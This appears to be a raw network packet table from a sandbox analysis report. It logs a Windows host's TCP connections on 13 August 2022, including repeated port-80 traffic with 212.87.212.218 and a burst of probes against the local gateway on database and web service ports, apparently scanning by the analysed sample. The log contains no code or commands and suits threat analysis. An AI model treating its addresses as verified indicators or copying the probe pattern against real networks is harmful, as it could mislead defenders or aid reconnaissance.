                                                                                                          Aug 13, 2022 09:07:18.739286900 CEST4434977520.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.739619970 CEST49775443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:18.753794909 CEST49775443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:18.753838062 CEST4434977520.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.754111052 CEST4434977520.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.759783030 CEST49775443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:18.759829044 CEST49775443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:18.759845972 CEST4434977520.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.759987116 CEST49775443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:18.787758112 CEST4434977520.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.787889957 CEST4434977520.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.787975073 CEST49775443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:18.788084030 CEST49775443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:18.788111925 CEST4434977520.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.882802963 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:18.882862091 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.883024931 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:18.883385897 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:18.883439064 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.883867979 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:18.888185024 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:18.888220072 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.888787985 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:18.888828039 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.961229086 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.961441994 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:18.962786913 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.963143110 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:18.966202974 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.966308117 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:18.967045069 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:18.967124939 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:19.353148937 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:19.353207111 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.353796959 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.353883982 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:19.390002012 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:19.390080929 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.390739918 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.390821934 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:19.564661980 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.564743996 CEST4434977820.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.564832926 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.565547943 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.565581083 CEST4434977820.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.606367111 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:19.657726049 CEST4434977820.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.657855988 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.660103083 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.660151005 CEST4434977820.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.660562992 CEST4434977820.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.661732912 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.661781073 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.661794901 CEST4434977820.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.662094116 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.689788103 CEST4434977820.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.689918041 CEST4434977820.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:19.689987898 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.690155983 CEST49778443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:19.690182924 CEST4434977820.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.030468941 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:20.030600071 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.114183903 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.114301920 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:20.114346027 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.114398003 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:20.114401102 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.114447117 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:20.838980913 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:20.839086056 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.906217098 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.906240940 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.906305075 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:20.906320095 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.906346083 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:20.906373978 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:20.906424046 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:21.594912052 CEST4976280192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:23.522505999 CEST4976080192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:23.539491892 CEST8049760212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:24.600979090 CEST49777443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:24.601002932 CEST44349777204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:24.601102114 CEST49776443192.168.2.7204.79.197.200
                                                                                                          Aug 13, 2022 09:07:24.601169109 CEST44349776204.79.197.200192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.253936052 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.253982067 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.254091978 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.258455992 CEST49780443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.258502960 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.258791924 CEST49780443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.379647017 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.379688978 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.380588055 CEST49780443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.380623102 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.530829906 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.530955076 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.536133051 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.536952019 CEST49780443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.637389898 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.637413025 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.637687922 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.638196945 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.776237965 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.776357889 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.791399002 CEST49780443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.791440010 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.791456938 CEST49780443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.791471004 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.791991949 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.792615891 CEST49780443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.930428982 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.930500031 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.930644989 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.930696011 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.930712938 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.930738926 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.943522930 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.943568945 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.943667889 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.944143057 CEST49780443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.977695942 CEST49779443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.977732897 CEST4434977920.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:26.979389906 CEST49780443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:26.979420900 CEST4434978020.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.267831087 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.267879963 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.268062115 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.278386116 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.278423071 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.420500994 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.420902967 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.509776115 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.509815931 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.513025999 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.513062954 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.675868988 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.675961018 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.676007986 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.676031113 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.676048040 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.676057100 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.676104069 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.676124096 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.718554020 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.718641043 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.718755960 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.718775034 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:27.718839884 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.718848944 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.724275112 CEST49781443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:27.724329948 CEST4434978120.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.178972960 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.179035902 CEST4434978220.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.179234982 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.264229059 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.264278889 CEST4434978220.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.408998013 CEST4434978220.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.409610033 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.504936934 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.504977942 CEST4434978220.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.510216951 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.510272026 CEST4434978220.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.519371033 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.519433975 CEST4434978320.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.519856930 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.520792961 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.520823956 CEST4434978320.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.616204023 CEST4434978320.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.617177963 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.619414091 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.619427919 CEST4434978320.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.619901896 CEST4434978320.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.629049063 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.629307985 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.629324913 CEST4434978320.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.629453897 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.653997898 CEST4434978220.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.654023886 CEST4434978220.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.654093027 CEST4434978220.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.654112101 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.654140949 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.654166937 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.657074928 CEST4434978320.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.657185078 CEST4434978320.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.657442093 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.657666922 CEST49783443192.168.2.720.199.120.182
                                                                                                          Aug 13, 2022 09:07:28.657691002 CEST4434978320.199.120.182192.168.2.7
                                                                                                          Aug 13, 2022 09:07:28.699551105 CEST49782443192.168.2.720.82.210.154
                                                                                                          Aug 13, 2022 09:07:28.699592113 CEST4434978220.82.210.154192.168.2.7
                                                                                                          Aug 13, 2022 09:07:31.120536089 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.120567083 CEST4434978420.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:31.120651960 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.121474028 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.121491909 CEST4434978420.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:31.219453096 CEST4434978420.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:31.219635963 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.225375891 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.225390911 CEST4434978420.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:31.225646973 CEST4434978420.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:31.230823994 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.230885029 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.230901003 CEST4434978420.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:31.231071949 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.258558035 CEST4434978420.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:31.258647919 CEST4434978420.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:31.258744955 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.260560036 CEST49784443192.168.2.720.199.120.151
                                                                                                          Aug 13, 2022 09:07:31.260592937 CEST4434978420.199.120.151192.168.2.7
                                                                                                          Aug 13, 2022 09:07:35.218192101 CEST4976480192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:35.237808943 CEST8049764212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:40.687695026 CEST497871433192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.760111094 CEST497896379192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.761662006 CEST4979180192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.762408018 CEST4979381192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.763261080 CEST49795443192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.763293028 CEST44349795192.168.2.1192.168.2.7
                                                                                                          Aug 13, 2022 09:07:40.763397932 CEST49795443192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.764177084 CEST497977001192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.766767979 CEST497998000192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.769618988 CEST498018080192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.771728992 CEST498038089192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.773572922 CEST498058443192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.774693012 CEST49795443192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:40.774796963 CEST44349795192.168.2.1192.168.2.7
                                                                                                          Aug 13, 2022 09:07:40.774868011 CEST49795443192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:42.310147047 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.310193062 CEST4434980720.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:07:42.310286045 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.310947895 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.310969114 CEST4434980720.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:07:42.399102926 CEST4434980720.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:07:42.399235964 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.402262926 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.402292013 CEST4434980720.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:07:42.402667046 CEST4434980720.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:07:42.404077053 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.404264927 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.404274940 CEST4434980720.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:07:42.404441118 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.431817055 CEST4434980720.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:07:42.431917906 CEST4434980720.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:07:42.431978941 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.432348013 CEST49807443192.168.2.720.199.120.85
                                                                                                          Aug 13, 2022 09:07:42.432367086 CEST4434980720.199.120.85192.168.2.7
                                                                                                          Aug 13, 2022 09:07:43.791040897 CEST497998000192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:43.791043043 CEST498038089192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:43.817882061 CEST498018080192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:43.817974091 CEST498058443192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:43.878602028 CEST49808443192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:43.878642082 CEST44349808192.168.2.1192.168.2.7
                                                                                                          Aug 13, 2022 09:07:43.879153967 CEST49808443192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:43.881905079 CEST49808443192.168.2.7192.168.2.1
                                                                                                          Aug 13, 2022 09:07:43.881922007 CEST44349808192.168.2.1192.168.2.7
                                                                                                          Aug 13, 2022 09:07:43.882427931 CEST44349808192.168.2.1192.168.2.7
                                                                                                          Aug 13, 2022 09:07:43.992064953 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.009581089 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009605885 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009623051 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009641886 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009659052 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009675980 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009695053 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009708881 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.009711981 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009735107 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009757996 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009779930 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.009780884 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.009805918 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.009826899 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.027278900 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027331114 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027390957 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.027404070 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027446985 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027486086 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027524948 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027533054 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.027565956 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027605057 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027607918 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.027648926 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027654886 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.027690887 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027728081 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027736902 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.027767897 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027808905 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027846098 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027858019 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.027885914 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027889967 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.027926922 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.027967930 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.028007984 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.028019905 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.028045893 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.028057098 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.028086901 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.029896975 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.045502901 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045546055 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045576096 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045624971 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045658112 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045666933 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.045687914 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045710087 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.045721054 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045746088 CEST4977380192.168.2.7212.87.212.218
                                                                                                          Aug 13, 2022 09:07:44.045753956 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045861959 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045892000 CEST8049773212.87.212.218192.168.2.7
                                                                                                          Aug 13, 2022 09:07:44.045913935 CEST4977380192.168.2.7212.87.212.218
